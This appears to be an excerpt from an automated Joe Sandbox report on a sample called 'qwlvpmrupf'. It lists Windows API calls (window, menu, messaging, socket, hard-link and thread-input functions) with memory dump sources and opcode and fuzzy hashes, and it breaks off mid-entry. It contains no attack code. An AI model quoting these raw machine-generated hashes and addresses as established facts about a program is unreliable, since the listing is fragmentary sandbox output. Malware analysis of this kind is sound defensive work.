                                                • Opcode Fuzzy Hash: 538816186b24277a88ddff8387ac69cc37d9ea3d1455bb7c64a319e730cdaa5f
                                                • Instruction Fuzzy Hash: A9915875A00206DFCB69CF58C4916AAB7F2FF58710F25816ED849AB340D739EA81CF90
                                                APIs
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003DCAC6
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 003DCB0C
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00442990,01034A78), ref: 003DCB55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: edba7be18510acc29a73005b89f17caa3f654f7f81525cfe9156bfda77743015
                                                • Instruction ID: f4861bff9e0a1756b083f73414bfc34cbab61d7e21d33eb4a81f27fdb03a1786
                                                • Opcode Fuzzy Hash: edba7be18510acc29a73005b89f17caa3f654f7f81525cfe9156bfda77743015
                                                • Instruction Fuzzy Hash: E641C2326253029FDB21DF24E846F6ABBE8AF84324F14561FF9659B391D770E804CB52
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0040DCD0,00000000,?,?,?,?), ref: 00404E09
                                                • GetWindowLongW.USER32 ref: 00404E26
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 3240d1e2f09a8f3e681083a94c12cf05bd9debeb19c23d3a53cb9d5e49d46db5
                                                • Instruction ID: a742ba603595c48503fd874a094ae3c864a2b956d5729c94ff6287c9f58c7c49
                                                • Opcode Fuzzy Hash: 3240d1e2f09a8f3e681083a94c12cf05bd9debeb19c23d3a53cb9d5e49d46db5
                                                • Instruction Fuzzy Hash: 2D317271100205ABDF219E78CC45BEB77A9EF49334F20472AFA79A32D0D778A8519794
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0040489F
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004048B3
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004048D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: ecdb074b914635940b31938e0c3ca07a1e9a156ca442f67f7cf37a96951b5540
                                                • Instruction ID: 67874ed841890cda070966b7637b424e7ae3f42ed11a21c7931e8541a1d9ca69
                                                • Opcode Fuzzy Hash: ecdb074b914635940b31938e0c3ca07a1e9a156ca442f67f7cf37a96951b5540
                                                • Instruction Fuzzy Hash: C121BF37600218AFDF259F90CC42FEB3B69EF88724F104625FE15BB1D0D6B5A8558BA4
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0040419F
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004041AF
                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004041D5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: 18b9f6322141dda5118e033ac095d767c983fa708bda814f41cdf29c0f3a02d9
                                                • Instruction ID: ca5a2f996a3fc48b671ce6f521ad77dc7211ec8a8b2149f06c73bd9a6553a8ea
                                                • Opcode Fuzzy Hash: 18b9f6322141dda5118e033ac095d767c983fa708bda814f41cdf29c0f3a02d9
                                                • Instruction Fuzzy Hash: E621C272610218BBEF218F54DC89FBB376EEFD9754F108125FA04AB2D0C6759C9287A4
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00404BAE
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00404BC3
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00404BD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: 041daafabf1589b70f4939415bd85b31b4bc4959b5e15c16a829286c6dffe0a5
                                                • Instruction ID: 45df7bfbc8958ea0b0fb3c585f1ac92de38dbc1095741dab1ec34b700bfaab50
                                                • Opcode Fuzzy Hash: 041daafabf1589b70f4939415bd85b31b4bc4959b5e15c16a829286c6dffe0a5
                                                • Instruction Fuzzy Hash: E411E371240208BEEF215F65CC06FAB7BA8EFC5B14F11452AFA55E61E0D675E8218B28
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00406220
                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0040624D
                                                • DrawMenuBar.USER32(?), ref: 0040625C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$InfoItem$Draw
                                                • String ID: 0
                                                • API String ID: 3227129158-4108050209
                                                • Opcode ID: 3d4b9fb700177bbdd7b1db3fa73980a06934a08a0d653f9b96f7fff63146043c
                                                • Instruction ID: bd595aa3acd9a3f954a4b7f100ec9096e76ed37d7d875cf58ebaaa6a9e6eebfb
                                                • Opcode Fuzzy Hash: 3d4b9fb700177bbdd7b1db3fa73980a06934a08a0d653f9b96f7fff63146043c
                                                • Instruction Fuzzy Hash: AB018031500218EFDF219F61DC44BAB7BB5FF44351F1480AAF84AEA190DB348995EF25
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71c2590894f82a49703453823d09b9a3c0e54cbb6d3a4eace36a270ad4b550f1
                                                • Instruction ID: c24f671721e5012e938a1985eb68bd6c98499e6736c34f89814499c4075cd21c
                                                • Opcode Fuzzy Hash: 71c2590894f82a49703453823d09b9a3c0e54cbb6d3a4eace36a270ad4b550f1
                                                • Instruction Fuzzy Hash: E4C16A76A00206EFCB09CFA4D894BAAB7B5FF48B04F11859AE405AF351D731ED41CB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                • Instruction ID: 3eeed3476b19ae56acf066f8edcfc5a6b725c1ad91fc306acfe423f18d7570ad
                                                • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                • Instruction Fuzzy Hash: D3A169769007869FDB27CF19C8917AEBBE4EF9B310F19426DE5859B281C3B88D41C750
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00410BD4,?), ref: 003D0E80
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00410BD4,?), ref: 003D0E98
                                                • CLSIDFromProgID.OLE32(?,?,00000000,0040DCE0,000000FF,?,00000000,00000800,00000000,?,00410BD4,?), ref: 003D0EBD
                                                • _memcmp.LIBVCRUNTIME ref: 003D0EDE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: 1831ecc356a8ee2f1e8b0fcbfa5903edfcd54ca5505a93c6ee39065717e5caa0
                                                • Instruction ID: fc09d62fda82a23c8d059204dd3035e2db4eb189dc4b4403c4af600ff08a4f4b
                                                • Opcode Fuzzy Hash: 1831ecc356a8ee2f1e8b0fcbfa5903edfcd54ca5505a93c6ee39065717e5caa0
                                                • Instruction Fuzzy Hash: 1A813972A00109EFCB05DFE4C984EEEB7B9FF89715F204559E506AB250DB71AE06CB60
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 003F245A
                                                • WSAGetLastError.WSOCK32 ref: 003F2468
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003F24E7
                                                • WSAGetLastError.WSOCK32 ref: 003F24F1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorLast$socket
                                                • String ID:
                                                • API String ID: 1881357543-0
                                                • Opcode ID: 6df32e4ce799310248f556ff3a3c347e398dbf58c0e7b8454e4b4e7f75724585
                                                • Instruction ID: e11c854c66414ff3ce8a3c886e4bd21fe3931cd6c4e6703ee95724270b8826c2
                                                • Opcode Fuzzy Hash: 6df32e4ce799310248f556ff3a3c347e398dbf58c0e7b8454e4b4e7f75724585
                                                • Instruction Fuzzy Hash: E741D075600200AFE722AF24C896F7A77E5AB04708F54C498FA199F3D2D776ED42CB90
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00406C41
                                                • ScreenToClient.USER32(?,?), ref: 00406C74
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00406CE1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: a337369578c95242dbc2dc53664b9799082b3cd375092de74e83f8b6ce446f3b
                                                • Instruction ID: 154786cc4a0d7b533d2dab87e592d84eacf8de208b11d37605bc521b3b380b3d
                                                • Opcode Fuzzy Hash: a337369578c95242dbc2dc53664b9799082b3cd375092de74e83f8b6ce446f3b
                                                • Instruction Fuzzy Hash: B4515F74A00108AFDF24DF64C9809AE7BB6FF45360F11816AF856AB3A0D774ED91CB94
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003E60DD
                                                • GetLastError.KERNEL32(?,00000000), ref: 003E6103
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003E6128
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003E6154
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: 1bc1ef8b7c4e8ed21f77705721f1ca0caf693207c259dd799f9b573477478895
                                                • Instruction ID: d89a4d81e016af2f960d2c130d451a1a3dd79c0bbe0906295afd0a433e9278d5
                                                • Opcode Fuzzy Hash: 1bc1ef8b7c4e8ed21f77705721f1ca0caf693207c259dd799f9b573477478895
                                                • Instruction Fuzzy Hash: 6B416F39600610DFCB22EF15C555A1EBBE2EF59350B19C088E85AAF362CB34FC01CB91
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 0040204A
                                                  • Part of subcall function 003D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003D42E6
                                                  • Part of subcall function 003D42CC: GetCurrentThreadId.KERNEL32 ref: 003D42ED
                                                  • Part of subcall function 003D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003D2E43), ref: 003D42F4
                                                • GetCaretPos.USER32(?), ref: 0040205E
                                                • ClientToScreen.USER32(00000000,?), ref: 004020AB
                                                • GetForegroundWindow.USER32 ref: 004020B1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: 372862735d1f6fac371acd9ee7ebb02aa6fbddf4a07dee09bc64a1a5c49fdcf8
                                                • Instruction ID: f2461ba00a423ad0869799a376a608e4a3ff9ffb5e83cd1ad2d30ee074f94cb7
                                                • Opcode Fuzzy Hash: 372862735d1f6fac371acd9ee7ebb02aa6fbddf4a07dee09bc64a1a5c49fdcf8
                                                • Instruction Fuzzy Hash: 4C314371D00209AFC715EFAAC985CAFB7F8EF48304B1084AAE519EB351D675DE05CB90
                                                APIs
                                                  • Part of subcall function 00374154: _wcslen.LIBCMT ref: 00374159
                                                • _wcslen.LIBCMT ref: 003DE7F7
                                                • _wcslen.LIBCMT ref: 003DE80E
                                                • _wcslen.LIBCMT ref: 003DE839
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 003DE844
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$ExtentPoint32Text
                                                • String ID:
                                                • API String ID: 3763101759-0
                                                • Opcode ID: 747ca1ab431fc4905c0793c14d927fe9b626a0d14b74e32b326e8cebfa49f5bb
                                                • Instruction ID: c4079296698be3a3c2dbf661b9371066acaf508b28b61de6382a546343c005e4
                                                • Opcode Fuzzy Hash: 747ca1ab431fc4905c0793c14d927fe9b626a0d14b74e32b326e8cebfa49f5bb
                                                • Instruction Fuzzy Hash: 8521A372D00314AFDB12EFA8D982BAEBBF8EF45750F154065E804BF345D6749E418BA1
                                                APIs
                                                  • Part of subcall function 003D960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,003D8199,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?), ref: 003D961B
                                                  • Part of subcall function 003D960C: lstrcpyW.KERNEL32(00000000,?,?,003D8199,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D9641
                                                  • Part of subcall function 003D960C: lstrcmpiW.KERNEL32(00000000,?,003D8199,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?), ref: 003D9672
                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D81B2
                                                • lstrcpyW.KERNEL32(00000000,?,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D81D8
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,003D8FE3,00000000,?,0000001C,?,?,00000000), ref: 003D8213
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: 47846aa450b0d9b330d69cae2f678a020b579305bdb87cba4de26847c544cbb3
                                                • Instruction ID: f18a01eab54ddc80626e4bc0d0b5796d144954695395cd15d4aab291546d776f
                                                • Opcode Fuzzy Hash: 47846aa450b0d9b330d69cae2f678a020b579305bdb87cba4de26847c544cbb3
                                                • Instruction Fuzzy Hash: CF11D33B600201ABCB166F74E845A7A77A9FF99760B50402BF946CB390EF31A911C794
                                                APIs
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040866A
                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00408689
                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004086A1
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003EC10A,00000000), ref: 004086CA
                                                  • Part of subcall function 00372441: GetWindowLongW.USER32(00000000,000000EB), ref: 00372452
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID:
                                                • API String ID: 847901565-0
                                                • Opcode ID: ebbcc9b62084ad22c8ea28d972a99e270989b71a55f00fe172554d5d9050924e
                                                • Instruction ID: 1cbe517aceedd365546f18faf4a36a39bcedbb08780c9e241af41ac9bbca3f80
                                                • Opcode Fuzzy Hash: ebbcc9b62084ad22c8ea28d972a99e270989b71a55f00fe172554d5d9050924e
                                                • Instruction Fuzzy Hash: 5911A271A00215AFDB109F68CE04A6B3BA5AB45370F124B39F979EB2E0DB358911CB58
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d10c9f8a6d22d7ebe96222aa676cfbf2d8ab732cef6c383f3852281c4a30c8ec
                                                • Instruction ID: 88bf180d8fc561b06f3fe2e774e8016f0595ff51b1cadb71f124112339590fae
                                                • Opcode Fuzzy Hash: d10c9f8a6d22d7ebe96222aa676cfbf2d8ab732cef6c383f3852281c4a30c8ec
                                                • Instruction Fuzzy Hash: BB01ADB26096167EF622667D6CC1F27674DDF533B8B320329B631A51D2EA708C418560
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 003D22D7
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003D22E9
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003D22FF
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003D231A
                                                Memory Dump Source
